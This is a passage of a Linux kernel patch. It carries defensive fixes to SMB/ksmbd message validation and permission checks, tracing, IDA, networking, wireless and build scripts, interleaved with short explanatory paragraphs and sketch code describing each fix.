+-	if (command >= NUMBER_OF_SMB2_COMMANDS) {
+-		cifs_dbg(VFS, "Invalid SMB2 command %d\n", command);
+-		return 1;
+-	}
+-
+ 	if (smb2_rsp_struct_sizes[command] != pdu->StructureSize2) {
+ 		if (command != SMB2_OPLOCK_BREAK_HE && (shdr->Status == 0 ||
+ 		    pdu->StructureSize2 != SMB2_ERROR_STRUCTURE_SIZE2_LE)) {
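
The smb2misc reordering is a validate-before-use hardening: StructureSize and Command are now checked before the length-handling code that relies on them, so a short or malformed header can no longer steer the parsing logic with unvalidated fields. The general shape of the check, with hypothetical names:

	#include <linux/errno.h>
	#include <linux/types.h>

	#define NR_CMDS 19

	struct hdr {			/* hypothetical wire header */
		__le16 struct_size;
		__le16 cmd;
	};

	static const size_t expected_len[NR_CMDS];

	/* Validate the self-describing fields first; only then let them
	 * drive table lookups or expected-length math. */
	static int check_msg(const struct hdr *h, size_t len)
	{
		if (le16_to_cpu(h->struct_size) != sizeof(*h))
			return -EINVAL;
		if (le16_to_cpu(h->cmd) >= NR_CMDS)
			return -EINVAL;
		if (len < expected_len[le16_to_cpu(h->cmd)])
			return -EINVAL;
		return 0;
	}
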
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 4596d2dfdec3a..5a157000bdfe6 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -398,8 +398,10 @@ smb2_dump_detail(void *buf, struct TCP_Server_Info *server)
+ 	cifs_server_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Mid: %llu Pid: %d\n",
+ 		 shdr->Command, shdr->Status, shdr->Flags, shdr->MessageId,
+ 		 shdr->Id.SyncId.ProcessId);
+-	cifs_server_dbg(VFS, "smb buf %p len %u\n", buf,
+-		 server->ops->calc_smb_size(buf));
++	if (!server->ops->check_message(buf, server->total_read, server)) {
++		cifs_server_dbg(VFS, "smb buf %p len %u\n", buf,
++				server->ops->calc_smb_size(buf));
++	}
+ #endif
+ }
+ 
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 2dfbf1b23cfa0..e65f998ea4cfc 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -3429,12 +3429,10 @@ __SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+ 	} else {
+ 		trace_smb3_close_done(xid, persistent_fid, tcon->tid,
+ 				      ses->Suid);
+-		/*
+-		 * Note that have to subtract 4 since struct network_open_info
+-		 * has a final 4 byte pad that close response does not have
+-		 */
+ 		if (pbuf)
+-			memcpy(pbuf, (char *)&rsp->CreationTime, sizeof(*pbuf) - 4);
++			memcpy(&pbuf->network_open_info,
++			       &rsp->network_open_info,
++			       sizeof(pbuf->network_open_info));
+ 	}
+ 
+ 	atomic_dec(&tcon->num_remote_opens);
+diff --git a/fs/smb/client/smb2pdu.h b/fs/smb/client/smb2pdu.h
+index a5773a06aba8e..8d011fedecd03 100644
+--- a/fs/smb/client/smb2pdu.h
++++ b/fs/smb/client/smb2pdu.h
+@@ -339,13 +339,15 @@ struct smb2_file_reparse_point_info {
+ } __packed;
+ 
+ struct smb2_file_network_open_info {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le32 Attributes;
++	struct_group(network_open_info,
++		__le64 CreationTime;
++		__le64 LastAccessTime;
++		__le64 LastWriteTime;
++		__le64 ChangeTime;
++		__le64 AllocationSize;
++		__le64 EndOfFile;
++		__le32 Attributes;
++	);
+ 	__le32 Reserved;
+ } __packed; /* level 34 Query also similar returned in close rsp and open rsp */
+ 
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 5593bb49954c6..a3936ff53d9d0 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -699,13 +699,16 @@ struct smb2_close_rsp {
+ 	__le16 StructureSize; /* 60 */
+ 	__le16 Flags;
+ 	__le32 Reserved;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
+-	__le64 EndOfFile;
+-	__le32 Attributes;
++	struct_group(network_open_info,
++		__le64 CreationTime;
++		__le64 LastAccessTime;
++		__le64 LastWriteTime;
++		__le64 ChangeTime;
++		/* Beginning of FILE_STANDARD_INFO equivalent */
++		__le64 AllocationSize;
++		__le64 EndOfFile;
++		__le32 Attributes;
++	);
+ } __packed;
+ 
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 6e5ed0ac578a6..46070951d163a 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -2969,7 +2969,7 @@ int smb2_open(struct ksmbd_work *work)
+ 					    &may_flags);
+ 
+ 	if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-		if (open_flags & O_CREAT) {
++		if (open_flags & (O_CREAT | O_TRUNC)) {
+ 			ksmbd_debug(SMB,
+ 				    "User does not have write permission\n");
+ 			rc = -EACCES;
+@@ -5941,12 +5941,6 @@ static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 	}
+ 	case FILE_RENAME_INFORMATION:
+ 	{
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			return -EACCES;
+-		}
+-
+ 		if (buf_len < sizeof(struct smb2_file_rename_info))
+ 			return -EINVAL;
+ 
+@@ -5966,12 +5960,6 @@ static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 	}
+ 	case FILE_DISPOSITION_INFORMATION:
+ 	{
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			return -EACCES;
+-		}
+-
+ 		if (buf_len < sizeof(struct smb2_file_disposition_info))
+ 			return -EINVAL;
+ 
+@@ -6033,7 +6021,7 @@ int smb2_set_info(struct ksmbd_work *work)
+ {
+ 	struct smb2_set_info_req *req;
+ 	struct smb2_set_info_rsp *rsp;
+-	struct ksmbd_file *fp;
++	struct ksmbd_file *fp = NULL;
+ 	int rc = 0;
+ 	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+ 
+@@ -6053,6 +6041,13 @@ int smb2_set_info(struct ksmbd_work *work)
+ 		rsp = smb2_get_msg(work->response_buf);
+ 	}
+ 
++	if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++		ksmbd_debug(SMB, "User does not have write permission\n");
++		pr_err("User does not have write permission\n");
++		rc = -EACCES;
++		goto err_out;
++	}
++
+ 	if (!has_file_id(id)) {
+ 		id = req->VolatileFileId;
+ 		pid = req->PersistentFileId;
+diff --git a/fs/smb/server/smbacl.c b/fs/smb/server/smbacl.c
+index d9bbd2eb89c35..6fd3560028d3a 100644
+--- a/fs/smb/server/smbacl.c
++++ b/fs/smb/server/smbacl.c
+@@ -401,10 +401,6 @@ static void parse_dacl(struct user_namespace *user_ns,
+ 	if (num_aces > ULONG_MAX / sizeof(struct smb_ace *))
+ 		return;
+ 
+-	ppace = kmalloc_array(num_aces, sizeof(struct smb_ace *), GFP_KERNEL);
+-	if (!ppace)
+-		return;
+-
+ 	ret = init_acl_state(&acl_state, num_aces);
+ 	if (ret)
+ 		return;
+@@ -414,6 +410,13 @@ static void parse_dacl(struct user_namespace *user_ns,
+ 		return;
+ 	}
+ 
++	ppace = kmalloc_array(num_aces, sizeof(struct smb_ace *), GFP_KERNEL);
++	if (!ppace) {
++		free_acl_state(&default_acl_state);
++		free_acl_state(&acl_state);
++		return;
++	}
++
+ 	/*
+ 	 * reset rwx permissions for user/group/other.
+ 	 * Also, if num_aces is 0 i.e. DACL has no ACEs,
+diff --git a/include/linux/ieee80211.h b/include/linux/ieee80211.h
+index 870ae4cd82029..dce105f67b4d8 100644
+--- a/include/linux/ieee80211.h
++++ b/include/linux/ieee80211.h
+@@ -2658,12 +2658,14 @@ ieee80211_he_oper_size(const u8 *he_oper_ie)
+ static inline const struct ieee80211_he_6ghz_oper *
+ ieee80211_he_6ghz_oper(const struct ieee80211_he_operation *he_oper)
+ {
+-	const u8 *ret = (const void *)&he_oper->optional;
++	const u8 *ret;
+ 	u32 he_oper_params;
+ 
+ 	if (!he_oper)
+ 		return NULL;
+ 
++	ret = (const void *)&he_oper->optional;
++
+ 	he_oper_params = le32_to_cpu(he_oper->he_oper_params);
+ 
+ 	if (!(he_oper_params & IEEE80211_HE_OPERATION_6GHZ_OP_INFO))
+diff --git a/include/linux/jbd2.h b/include/linux/jbd2.h
+index ebb1608d9dcd2..6611af5f1d0c6 100644
+--- a/include/linux/jbd2.h
++++ b/include/linux/jbd2.h
+@@ -1374,6 +1374,9 @@ JBD2_FEATURE_INCOMPAT_FUNCS(csum2,		CSUM_V2)
+ JBD2_FEATURE_INCOMPAT_FUNCS(csum3,		CSUM_V3)
+ JBD2_FEATURE_INCOMPAT_FUNCS(fast_commit,	FAST_COMMIT)
+ 
++/* Journal high priority write IO operation flags */
++#define JBD2_JOURNAL_REQ_FLAGS		(REQ_META | REQ_SYNC | REQ_IDLE)
++
+ /*
+  * Journal flag definitions
+  */
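
The flag changes across jbd2 above all funnel through this macro: journal writes are uniformly tagged REQ_META (metadata), REQ_SYNC and REQ_IDLE, a combination that blk-wbt's writeback throttling treats as exempt, while each call site keeps only the ordering extras it actually needs (REQ_FUA, REQ_PREFLUSH). A hypothetical helper showing how the pieces compose:

	#include <linux/blk_types.h>
	#include <linux/jbd2.h>

	/* Hypothetical: every journal write ORs in the same base flags;
	 * the caller adds only ordering requirements. */
	static inline blk_opf_t jbd2_write_opf(blk_opf_t extra)
	{
		return REQ_OP_WRITE | JBD2_JOURNAL_REQ_FLAGS | extra;
	}
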
+diff --git a/init/Kconfig b/init/Kconfig
+index de255842f5d09..148704640252e 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -1914,7 +1914,7 @@ config RUST
+ 	depends on !MODVERSIONS
+ 	depends on !GCC_PLUGINS
+ 	depends on !RANDSTRUCT
+-	depends on !DEBUG_INFO_BTF
++	depends on !DEBUG_INFO_BTF || PAHOLE_HAS_LANG_EXCLUDE
+ 	select CONSTRUCTORS
+ 	help
+ 	  Enables Rust support in the kernel.
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 71cad4f1323c6..1285e7fb597ee 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -3644,6 +3644,12 @@ rb_reserve_next_event(struct trace_buffer *buffer,
+ 	int nr_loops = 0;
+ 	int add_ts_default;
+ 
++	/* ring buffer does cmpxchg, make sure it is safe in NMI context */
++	if (!IS_ENABLED(CONFIG_ARCH_HAVE_NMI_SAFE_CMPXCHG) &&
++	    (unlikely(in_nmi()))) {
++		return NULL;
++	}
++
+ 	rb_start_commit(cpu_buffer);
+ 	/* The commit page can not change after this */
+ 
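
IS_ENABLED() expands to a compile-time 1 or 0, so on architectures that select ARCH_HAVE_NMI_SAFE_CMPXCHG the new guard folds away entirely; only the remaining architectures pay the in_nmi() test and drop the event rather than risk a cmpxchg that can deadlock against the context it interrupted. The same guard in isolation (a sketch, not the exact tracing code):

	#include <linux/kconfig.h>
	#include <linux/preempt.h>

	static inline bool must_drop_in_nmi(void)
	{
		/* Constant-folds to "return false" when the arch sets the symbol. */
		return !IS_ENABLED(CONFIG_ARCH_HAVE_NMI_SAFE_CMPXCHG) && in_nmi();
	}
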
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index deae65af76ecf..2b3c4cd8382b3 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -4679,7 +4679,11 @@ static int s_show(struct seq_file *m, void *v)
+ 		iter->leftover = ret;
+ 
+ 	} else {
+-		print_trace_line(iter);
++		ret = print_trace_line(iter);
++		if (ret == TRACE_TYPE_PARTIAL_LINE) {
++			iter->seq.full = 0;
++			trace_seq_puts(&iter->seq, "[LINE TOO BIG]\n");
++		}
+ 		ret = trace_print_seq(m, &iter->seq);
+ 		/*
+ 		 * If we overflow the seq_file buffer, then it will
+@@ -4912,6 +4916,12 @@ int tracing_release_file_tr(struct inode *inode, struct file *filp)
+ 	return 0;
+ }
+ 
++int tracing_single_release_file_tr(struct inode *inode, struct file *filp)
++{
++	tracing_release_file_tr(inode, filp);
++	return single_release(inode, filp);
++}
++
+ static int tracing_mark_open(struct inode *inode, struct file *filp)
+ {
+ 	stream_open(inode, filp);
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 10aaafa2936dc..aad7fcd84617c 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -592,6 +592,7 @@ int tracing_open_generic(struct inode *inode, struct file *filp);
+ int tracing_open_generic_tr(struct inode *inode, struct file *filp);
+ int tracing_open_file_tr(struct inode *inode, struct file *filp);
+ int tracing_release_file_tr(struct inode *inode, struct file *filp);
++int tracing_single_release_file_tr(struct inode *inode, struct file *filp);
+ bool tracing_is_disabled(void);
+ bool tracer_tracing_is_on(struct trace_array *tr);
+ void tracer_tracing_on(struct trace_array *tr);
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 1470af2190735..3b0da1bddf633 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -5532,10 +5532,12 @@ static int event_hist_open(struct inode *inode, struct file *file)
+ {
+ 	int ret;
+ 
+-	ret = security_locked_down(LOCKDOWN_TRACEFS);
++	ret = tracing_open_file_tr(inode, file);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Clear private_data to avoid warning in single_open() */
++	file->private_data = NULL;
+ 	return single_open(file, hist_show, file);
+ }
+ 
+@@ -5543,7 +5545,7 @@ const struct file_operations event_hist_fops = {
+ 	.open = event_hist_open,
+ 	.read = seq_read,
+ 	.llseek = seq_lseek,
+-	.release = single_release,
++	.release = tracing_single_release_file_tr,
+ };
+ 
+ #ifdef CONFIG_HIST_TRIGGERS_DEBUG
+@@ -5809,10 +5811,12 @@ static int event_hist_debug_open(struct inode *inode, struct file *file)
+ {
+ 	int ret;
+ 
+-	ret = security_locked_down(LOCKDOWN_TRACEFS);
++	ret = tracing_open_file_tr(inode, file);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Clear private_data to avoid warning in single_open() */
++	file->private_data = NULL;
+ 	return single_open(file, hist_debug_show, file);
+ }
+ 
+@@ -5820,7 +5824,7 @@ const struct file_operations event_hist_debug_fops = {
+ 	.open = event_hist_debug_open,
+ 	.read = seq_read,
+ 	.llseek = seq_lseek,
+-	.release = single_release,
++	.release = tracing_single_release_file_tr,
+ };
+ #endif
+ 
+diff --git a/kernel/trace/trace_output.c b/kernel/trace/trace_output.c
+index 5cd4fb6563068..bf1965b180992 100644
+--- a/kernel/trace/trace_output.c
++++ b/kernel/trace/trace_output.c
+@@ -1445,11 +1445,12 @@ static enum print_line_t trace_print_print(struct trace_iterator *iter,
+ {
+ 	struct print_entry *field;
+ 	struct trace_seq *s = &iter->seq;
++	int max = iter->ent_size - offsetof(struct print_entry, buf);
+ 
+ 	trace_assign_type(field, iter->ent);
+ 
+ 	seq_print_ip_sym(s, field->ip, flags);
+-	trace_seq_printf(s, ": %s", field->buf);
++	trace_seq_printf(s, ": %.*s", max, field->buf);
+ 
+ 	return trace_handle_return(s);
+ }
+@@ -1458,10 +1459,11 @@ static enum print_line_t trace_print_raw(struct trace_iterator *iter, int flags,
+ 					 struct trace_event *event)
+ {
+ 	struct print_entry *field;
++	int max = iter->ent_size - offsetof(struct print_entry, buf);
+ 
+ 	trace_assign_type(field, iter->ent);
+ 
+-	trace_seq_printf(&iter->seq, "# %lx %s", field->ip, field->buf);
++	trace_seq_printf(&iter->seq, "# %lx %.*s", field->ip, max, field->buf);
+ 
+ 	return trace_handle_return(&iter->seq);
+ }
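
The "%.*s" fix works because a print_entry's buf is only guaranteed to hold ent_size minus the header offset bytes, with no NUL terminator promised inside the record; the precision argument caps how many bytes printf-style code may read even when no terminator is present. A runnable demonstration of the idiom (toy struct, not the real print_entry):

	#include <stdio.h>
	#include <stddef.h>
	#include <string.h>

	struct rec {			/* toy stand-in for struct print_entry */
		unsigned long ip;
		char buf[8];
	};

	int main(void)
	{
		struct rec r = { .ip = 0 };
		size_t ent_size = offsetof(struct rec, buf) + 4; /* record holds 4 bytes */
		int max = ent_size - offsetof(struct rec, buf);

		memcpy(r.buf, "abcdEFGH", sizeof(r.buf));	/* no NUL anywhere in buf */
		printf("%.*s\n", max, r.buf);			/* prints "abcd", reads no further */
		return 0;
	}
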
+diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
+index 4db0199651f56..95541b99aa8ea 100644
+--- a/lib/Kconfig.debug
++++ b/lib/Kconfig.debug
+@@ -364,6 +364,15 @@ config PAHOLE_HAS_BTF_TAG
+ 	  btf_decl_tag) or not. Currently only clang compiler implements
+ 	  these attributes, so make the config depend on CC_IS_CLANG.
+ 
++config PAHOLE_HAS_LANG_EXCLUDE
++	def_bool PAHOLE_VERSION >= 124
++	help
++	  Support for the --lang_exclude flag which makes pahole exclude
++	  compilation units from the supplied language. Used in Kbuild to
++	  omit Rust CUs, which are not supported in version 1.24 of pahole;
++	  otherwise it would emit malformed kernel and module binaries when
++	  using DEBUG_INFO_BTF_MODULES.
++
+ config DEBUG_INFO_BTF_MODULES
+ 	def_bool y
+ 	depends on DEBUG_INFO_BTF && MODULES && PAHOLE_HAS_SPLIT_BTF
+diff --git a/lib/idr.c b/lib/idr.c
+index 13f2758c23773..da36054c3ca02 100644
+--- a/lib/idr.c
++++ b/lib/idr.c
+@@ -508,7 +508,7 @@ void ida_free(struct ida *ida, unsigned int id)
+ 			goto delete;
+ 		xas_store(&xas, xa_mk_value(v));
+ 	} else {
+-		if (!test_bit(bit, bitmap->bitmap))
++		if (!bitmap || !test_bit(bit, bitmap->bitmap))
+ 			goto err;
+ 		__clear_bit(bit, bitmap->bitmap);
+ 		xas_set_mark(&xas, XA_FREE_MARK);
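
The added "!bitmap ||" test covers ida_free() on an ID whose slot holds neither a value entry nor a bitmap: bitmap is then NULL and the old code dereferenced it in test_bit(). With the fix, freeing an ID you do not own lands on the intended "not allocated" warning instead of a NULL-pointer crash; the selftest added just below drives exactly those paths. In caller terms the misuse looks like this (a sketch):

	#include <linux/idr.h>
	#include <linux/gfp.h>

	static DEFINE_IDA(ida);

	static void demo(void)
	{
		ida_free(&ida, 10);	/* empty IDA: warns, must not crash */
		if (ida_alloc_min(&ida, 1023, GFP_KERNEL) == 1023) {
			ida_free(&ida, 0);	/* an ID we never owned: warns */
			ida_free(&ida, 1023);	/* the ID we actually hold */
		}
	}
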
+diff --git a/lib/test_ida.c b/lib/test_ida.c
+index b068806259615..55105baa19da9 100644
+--- a/lib/test_ida.c
++++ b/lib/test_ida.c
+@@ -150,6 +150,45 @@ static void ida_check_conv(struct ida *ida)
+ 	IDA_BUG_ON(ida, !ida_is_empty(ida));
+ }
+ 
++/*
++ * Check various situations where we attempt to free an ID we don't own.
++ */
++static void ida_check_bad_free(struct ida *ida)
++{
++	unsigned long i;
++
++	printk("vvv Ignore \"not allocated\" warnings\n");
++	/* IDA is empty; all of these will fail */
++	ida_free(ida, 0);
++	for (i = 0; i < 31; i++)
++		ida_free(ida, 1 << i);
++
++	/* IDA contains a single value entry */
++	IDA_BUG_ON(ida, ida_alloc_min(ida, 3, GFP_KERNEL) != 3);
++	ida_free(ida, 0);
++	for (i = 0; i < 31; i++)
++		ida_free(ida, 1 << i);
++
++	/* IDA contains a single bitmap */
++	IDA_BUG_ON(ida, ida_alloc_min(ida, 1023, GFP_KERNEL) != 1023);
++	ida_free(ida, 0);
++	for (i = 0; i < 31; i++)
++		ida_free(ida, 1 << i);
++
++	/* IDA contains a tree */
++	IDA_BUG_ON(ida, ida_alloc_min(ida, (1 << 20) - 1, GFP_KERNEL) != (1 << 20) - 1);
++	ida_free(ida, 0);
++	for (i = 0; i < 31; i++)
++		ida_free(ida, 1 << i);
++	printk("^^^ \"not allocated\" warnings over\n");
++
++	ida_free(ida, 3);
++	ida_free(ida, 1023);
++	ida_free(ida, (1 << 20) - 1);
++
++	IDA_BUG_ON(ida, !ida_is_empty(ida));
++}
++
+ static DEFINE_IDA(ida);
+ 
+ static int ida_checks(void)
+@@ -162,6 +201,7 @@ static int ida_checks(void)
+ 	ida_check_leaf(&ida, 1024 * 64);
+ 	ida_check_max(&ida);
+ 	ida_check_conv(&ida);
++	ida_check_bad_free(&ida);
+ 
+ 	printk("IDA: %u of %u tests passed\n", tests_passed, tests_run);
+ 	return (tests_run != tests_passed) ? 0 : -EINVAL;
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index 41daa47d03934..c842f150c3048 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -253,9 +253,11 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ {
+ 	int max_clean = atomic_read(&tbl->gc_entries) -
+ 			READ_ONCE(tbl->gc_thresh2);
++	u64 tmax = ktime_get_ns() + NSEC_PER_MSEC;
+ 	unsigned long tref = jiffies - 5 * HZ;
+ 	struct neighbour *n, *tmp;
+ 	int shrunk = 0;
++	int loop = 0;
+ 
+ 	NEIGH_CACHE_STAT_INC(tbl, forced_gc_runs);
+ 
+@@ -278,11 +280,16 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ 				shrunk++;
+ 			if (shrunk >= max_clean)
+ 				break;
++			if (++loop == 16) {
++				if (ktime_get_ns() > tmax)
++					goto unlock;
++				loop = 0;
++			}
+ 		}
+ 	}
+ 
+ 	WRITE_ONCE(tbl->last_flush, jiffies);
+-
++unlock:
+ 	write_unlock_bh(&tbl->lock);
+ 
+ 	return shrunk;
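
The forced-GC change bounds how long the walk may hold tbl->lock (a BH-disabling write lock): it gives itself roughly one millisecond (tmax) and, to keep the clock reads themselves cheap, only consults ktime_get_ns() every 16 entries. The pattern in isolation, with hypothetical entry/process names:

	#include <linux/ktime.h>
	#include <linux/list.h>

	struct entry {			/* hypothetical list element */
		struct list_head list;
	};

	static void process(struct entry *e) { }	/* hypothetical work item */

	static void bounded_walk(struct list_head *head)
	{
		u64 deadline = ktime_get_ns() + NSEC_PER_MSEC;
		struct entry *e;
		int batch = 0;

		list_for_each_entry(e, head, list) {
			process(e);
			/* Sample the clock once per batch, not per entry. */
			if (++batch == 16) {
				if (ktime_get_ns() > deadline)
					break;
				batch = 0;
			}
		}
	}
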
+diff --git a/net/mac80211/ht.c b/net/mac80211/ht.c
+index ae42e956eff5a..9bfe128ada47d 100644
+--- a/net/mac80211/ht.c
++++ b/net/mac80211/ht.c
+@@ -271,6 +271,7 @@ bool ieee80211_ht_cap_ie_to_sta_ht_cap(struct ieee80211_sub_if_data *sdata,
+ 	case NL80211_CHAN_WIDTH_80:
+ 	case NL80211_CHAN_WIDTH_80P80:
+ 	case NL80211_CHAN_WIDTH_160:
++	case NL80211_CHAN_WIDTH_320:
+ 		bw = ht_cap.cap & IEEE80211_HT_CAP_SUP_WIDTH_20_40 ?
+ 				IEEE80211_STA_RX_BW_40 : IEEE80211_STA_RX_BW_20;
+ 		break;
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 0c786ceda5ee6..74027bb5b4296 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -103,6 +103,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			mp_opt->suboptions |= OPTION_MPTCP_DSS;
+ 			mp_opt->use_map = 1;
+ 			mp_opt->mpc_map = 1;
++			mp_opt->use_ack = 0;
+ 			mp_opt->data_len = get_unaligned_be16(ptr);
+ 			ptr += 2;
+ 		}
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index 3e40a1ba48f79..4a13b9f7abb44 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -569,7 +569,9 @@ static int ctrl_cmd_del_server(struct sockaddr_qrtr *from,
+ 	if (!node)
+ 		return -ENOENT;
+ 
+-	return server_del(node, port, true);
++	server_del(node, port, true);
++
++	return 0;
+ }
+ 
+ static int ctrl_cmd_new_lookup(struct sockaddr_qrtr *from,
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 63d75fecc2c53..8809e668ed912 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -216,7 +216,9 @@ static void cfg80211_rfkill_poll(struct rfkill *rfkill, void *data)
+ {
+ 	struct cfg80211_registered_device *rdev = data;
+ 
++	wiphy_lock(&rdev->wiphy);
+ 	rdev_rfkill_poll(rdev);
++	wiphy_unlock(&rdev->wiphy);
+ }
+ 
+ void cfg80211_stop_p2p_device(struct cfg80211_registered_device *rdev,
+diff --git a/scripts/decode_stacktrace.sh b/scripts/decode_stacktrace.sh
+index 564c5632e1a24..bfe5a4082d8ea 100755
+--- a/scripts/decode_stacktrace.sh
++++ b/scripts/decode_stacktrace.sh
+@@ -16,6 +16,21 @@ elif type c++filt >/dev/null 2>&1 ; then
+ 	cppfilt_opts=-i
+ fi
+ 
++UTIL_SUFFIX=
++if [[ -z ${LLVM:-} ]]; then
++	UTIL_PREFIX=${CROSS_COMPILE:-}
++else
++	UTIL_PREFIX=llvm-
++	if [[ ${LLVM} == */ ]]; then
++		UTIL_PREFIX=${LLVM}${UTIL_PREFIX}
++	elif [[ ${LLVM} == -* ]]; then
++		UTIL_SUFFIX=${LLVM}
++	fi
++fi
++
++READELF=${UTIL_PREFIX}readelf${UTIL_SUFFIX}
++ADDR2LINE=${UTIL_PREFIX}addr2line${UTIL_SUFFIX}
++
+ if [[ $1 == "-r" ]] ; then
+ 	vmlinux=""
+ 	basepath="auto"
+@@ -75,7 +90,7 @@ find_module() {
+ 
+ 	if [[ "$modpath" != "" ]] ; then
+ 		for fn in $(find "$modpath" -name "${module//_/[-_]}.ko*") ; do
+-			if readelf -WS "$fn" | grep -qwF .debug_line ; then
++			if ${READELF} -WS "$fn" | grep -qwF .debug_line ; then
+ 				echo $fn
+ 				return
+ 			fi
+@@ -169,7 +184,7 @@ parse_symbol() {
+ 	if [[ $aarray_support == true && "${cache[$module,$address]+isset}" == "isset" ]]; then
+ 		local code=${cache[$module,$address]}
+ 	else
+-		local code=$(${CROSS_COMPILE}addr2line -i -e "$objfile" "$address" 2>/dev/null)
++		local code=$(${ADDR2LINE} -i -e "$objfile" "$address" 2>/dev/null)
+ 		if [[ $aarray_support == true ]]; then
+ 			cache[$module,$address]=$code
+ 		fi
+diff --git a/scripts/pahole-flags.sh b/scripts/pahole-flags.sh
+index 0d99ef17e4a52..728d55190d97a 100755
+--- a/scripts/pahole-flags.sh
++++ b/scripts/pahole-flags.sh
+@@ -19,5 +19,12 @@ fi
+ if [ "${pahole_ver}" -ge "122" ]; then
+ 	extra_paholeopt="${extra_paholeopt} -j"
+ fi
++if [ "${pahole_ver}" -ge "124" ]; then
++	# see PAHOLE_HAS_LANG_EXCLUDE
++	extra_paholeopt="${extra_paholeopt} --lang_exclude=rust"
++fi
++if [ "${pahole_ver}" -ge "125" ]; then
++	extra_paholeopt="${extra_paholeopt} --skip_encoding_btf_inconsistent_proto --btf_gen_optimized"
++fi
+ 
+ echo ${extra_paholeopt}
+diff --git a/sound/hda/intel-nhlt.c b/sound/hda/intel-nhlt.c
+index 2c4dfc0b7e342..696a958d93e9c 100644
+--- a/sound/hda/intel-nhlt.c
++++ b/sound/hda/intel-nhlt.c
+@@ -238,7 +238,7 @@ EXPORT_SYMBOL(intel_nhlt_ssp_mclk_mask);
+ 
+ static struct nhlt_specific_cfg *
+ nhlt_get_specific_cfg(struct device *dev, struct nhlt_fmt *fmt, u8 num_ch,
+-		      u32 rate, u8 vbps, u8 bps)
++		      u32 rate, u8 vbps, u8 bps, bool ignore_vbps)
+ {
+ 	struct nhlt_fmt_cfg *cfg = fmt->fmt_config;
+ 	struct wav_fmt *wfmt;
+@@ -255,8 +255,12 @@ nhlt_get_specific_cfg(struct device *dev, struct nhlt_fmt *fmt, u8 num_ch,
+ 		dev_dbg(dev, "Endpoint format: ch=%d fmt=%d/%d rate=%d\n",
+ 			wfmt->channels, _vbps, _bps, wfmt->samples_per_sec);
+ 
++		/*
++		 * When looking for an exact configuration match, ignore the
++		 * vbps from the NHLT table when ignore_vbps is true.
++		 */
+ 		if (wfmt->channels == num_ch && wfmt->samples_per_sec == rate &&
+-		    vbps == _vbps && bps == _bps)
++		    (ignore_vbps || vbps == _vbps) && bps == _bps)
+ 			return &cfg->config;
+ 
+ 		cfg = (struct nhlt_fmt_cfg *)(cfg->config.caps + cfg->config.size);
+@@ -289,6 +293,7 @@ intel_nhlt_get_endpoint_blob(struct device *dev, struct nhlt_acpi_table *nhlt,
+ {
+ 	struct nhlt_specific_cfg *cfg;
+ 	struct nhlt_endpoint *epnt;
++	bool ignore_vbps = false;
+ 	struct nhlt_fmt *fmt;
+ 	int i;
+ 
+@@ -298,7 +303,26 @@ intel_nhlt_get_endpoint_blob(struct device *dev, struct nhlt_acpi_table *nhlt,
+ 	dev_dbg(dev, "Looking for configuration:\n");
+ 	dev_dbg(dev, "  vbus_id=%d link_type=%d dir=%d, dev_type=%d\n",
+ 		bus_id, link_type, dir, dev_type);
